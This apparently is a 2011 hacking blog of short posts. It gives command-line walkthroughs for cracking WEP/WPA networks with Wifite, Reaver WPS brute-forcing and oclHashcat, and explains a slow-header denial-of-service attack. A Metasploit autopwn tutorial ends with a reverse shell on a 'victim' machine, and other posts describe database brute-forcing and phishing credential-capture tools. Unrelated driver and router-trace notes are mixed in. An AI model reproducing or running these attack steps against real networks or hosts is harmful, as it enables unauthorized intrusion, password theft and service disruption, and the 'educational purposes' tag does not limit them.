Samstag, 31. Dezember 2011

Automated Mass WPA / WEP Hacker with Wifite ( wifite.py )





NEW VIDEO - NEW VIDEO - NEW VIDEO - NEW VIDEO - NEW VIDEO


The Purpose is to attack multiple WEP and WPA encrypted networks at the same time. this tool is customizable to be automated with only a few arguments.

Features:

  • sorts targets by power (in dB); cracks closest access points first
  • automatically deauths clients of hidden networks to decloak SSIDs
  • numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc)
  • customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc)
  • "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete
  • all WPA handshakes are backed up to wifite.py's current directory
  • smart WPA deauthentication -- cycles between all clients and broadcast deauths
  • stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit
  • switching WEP attack methods does not reset IVs
  • intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround
  • SKA support (untested)
  • displays session summary at exit; shows any cracked keys
  • all passwords saved to log.txt
  • built-in updater: ./wifite.py -upgrade

Freitag, 30. Dezember 2011

SIOCSIFFLAGS: Unknown error 132 message

If you are using Backtrack 5 or Backtrack 5 R1 within a Vmware while using USB Wifi Devices like the RTL8187 Chipset ( ALFA AWUS 036H ) you run probably into this Error Message:

airmon-ng start wlan0

SIOCSIFFLAGS: Unknown error 132 message



To solve this issue, use the following commands:

prepare-kernel-sources

cd /usr/src/linux/drivers/net/wireless/rtl818x/rtl8187/

wget http://backtrack-linux.org/silly-rfkill-patch.patch

patch -p0 < silly-rfkill-patch.patch

cd /usr/src/linux

make drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko

cp drivers/net/wireless/rtl818x/rtl8187/rtl8187.ko /lib/modules/2.6.39.4/kernel/drivers
/net/wireless/rtl818x/rtl8187/rtl8187.ko

After that reboot your vmware/backtrack, and your issue is solved.

Reaver 1.2 WPS Brute Force Cracker to recover Passphrase





NEW VIDEO - NEW VIDEO



NEW Reaver 1.4 Tutorial


http://maurisdump.blogspot.com/2012/01/reaver-14-wps-bruteforcing-tool-upgrade.html








Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations. Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases

On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase.

Prerequisites

You must be running Linux
You must have a wireless card capable of raw injection
You must put your wireless card into monitor mode. This is most easily done using airmon-ng from the aircrack-ng tool suite.

Basic Usage

First, make sure your wireless card is in monitor mode:

# airmon-ng start wlan0

To run Reaver, you must specify the BSSID of the target AP and the name of the monitor mode interface (usually 'mon0', not 'wlan0', although this will vary based on your wireless card/drivers):

# reaver -i mon0 -b 00:01:02:03:04:05

You will probably also want to use -vv to get verbose info about Reaver's progress:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv

Speeding Up the Attack

By default, Reaver has a 1 second delay between pin attempts. You can disable this delay by adding '-d 0' on the command line, but some APs may not like it:

# reaver -i mon0 -b 00:01:02:03:04:05 -vv -d 0

Montag, 26. Dezember 2011

How to Convert your.cap File to hccap for use with oclHashCat for WPA



Upload your .cap file to the following cap2hccap convert Service:

http://hashcat.net/cap2hccap/

Then use oclhashcat-plus to crack it, command for using with ATI GPU´s:

Open a Dosbox, use the following cmd-line:

C:\oclHashcat-plus-0.06\oclHashcat-plus64.exe -m 2500 D:\oclHashcat-plus-0.06\1.hccap D:\oclHashcat-plus-0.06\wpa.txt


  • -m 2500  -> defines that we want to crack a WPA file
  • wpa.txt   -> your Dictionarie / Wordlist File


Note:

If you encounter difficulties regarding the opencl.dll, just download the latest ATI Catalyst Drivers and select the ATI SDK and install it, works without a reboot.

Samstag, 24. Dezember 2011

Strip WPA2 Handshake with Wireshark


How to Strip your Handshake with Wireshark:


  • Open your Capture in Wireshark
  •  Enter "eapol || wlan.fc.type_subtype == 0x04 || wlan.fc.type_subtype == 0x08" as filter expression (without quotes) then press "Apply"
  •  Go to File -> Save As... Menu, Enter new File name and select "Displayed" to save filtered packets only.

Dienstag, 13. Dezember 2011

Easy Apache / IIS Slow Header Attack



Slow Header Attack

The Slow Header attack works by exploiting the Client idle timeout value on the server side. This timeout is configured on server side to drop a client connection if a client was found idle during the time interval. The Slow header attack finds the approximate timeout value set in Server side and then chooses a value which is lower than the configured value. The attack then initiates a Http Request with Partial header to the server. It keeps sending one header based on the chosen value and this way Client idle timeout will not be triggered on the server side and Request will not be complete

In essence you can send a Denial Of Service attack to website using one laptop over a proxy.


How to own a Windows XP SP3 Box with Metasploit / Backtrack.

Tutorial: Metasploit DB Autopwning

Commands:

/etc/init.d/postgresql-8.3 start # start the database
msfconsole # start metasploit




db_connect pentest # connect to database
db_nmap HOST IP/ HOSTNAME # Scan for open Ports
db_autopwnage -e -p # -e = All matched Targets, # -p = Select Attacks based on open Ports

Wait until a Meterpreter Session, like:

*] Meterpreter session 1 opened (10.0.0.128:44919 - 10.0.0.130:33411)

Wait until the Attack is over or STRG+C to Terminate the Attack.

Now:

Sessions # shows your connects to the victim
Session -i 1 # you join session 1
shell # opens reverse shell on victim

Use the help function, to get information about other available commands.

FOR EDUCATIONAL PURPOSES ONLY



HexorBase - The Database Hacker Tool

Hexorbase is capable of connecting to any remote accesable database, performing SQL queries and bruteforce attacks against:
mySQL, Oracle, SQlite, SQLserver and PostgreSQL

Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver




Phishing Attacks with GUI powered Ghost Phisher Fake DNS, Fake DHCP, Fake Webserver


Ghost Phisher is a computer security application that comes inbuilt with a Fake DNS Server, Fake DHCP Server, Fake HTTP server and also has an integrated area for automatic capture and logging of HTTP form method credentials to a database. The program could be used as an honey pot , could be used to service DHCP request , DNS requests or phishing attacks.

Freitag, 7. Oktober 2011

How to allow root user ssh access

How to grant root User SSH Access

cmd-line:


sed -e 's/PermitRootLogin no/PermitRootLogin yes/' -i /etc/ssh/sshd_config
/sbin/service sshd reload

This allowes SSH Access for the user "root".

Lancom Commands

trace + all schaltet alle Trace-Ausgaben ein
trace - all schaltet alle Trace-Ausgaben aus
trace + protocol display schaltet die Ausgabe aller
Verrbindungsprotokolle und der Status- und
Fehlermeldungen ein

trace + all - icmp
schaltet alle Trace-Ausgaben mit Ausnahme des
ICMP-Protokolls ein
trace ppp zeigt den Zustand des PPPs an
trace # ipx-rt display schaltet die Trace-Ausgaben des IPX-Routers
und der Display- Ausgaben um
trace + ip-router @ GEGENSTELLE-A GEGENSTELLE-B schaltet die Ausgaben des IP-Routers an für alle
Ausgaben, die sich auf die Gegenstellen A oder B
beziehen
trace + ip-router @ GEGENSTELLE-A
GEGENSTELLE-B -ICM
P schaltet die Ausgaben des IP-Routers an für alle
Ausgaben, die sich auf die Gegenstellen A oder B
beziehen, die nicht ICMP verwenden
trace + ip-router @ +TCP + "port: 80" schaltet die Ausgaben des IP-Routers an für alle
Ausgaben, die TCP/IP und den Port 80
verwenden. “port: 80” steht in
Anführungszeichen, um auch das Leerzeichen als
Teil der Zeichenkette einzubeziehen.
trace + vpn-status display schaltet die Ausgaben für einen VPN-Status Trace
ein. Der Parameter display liefert zusätzlich
Status- und Error-Ausgaben.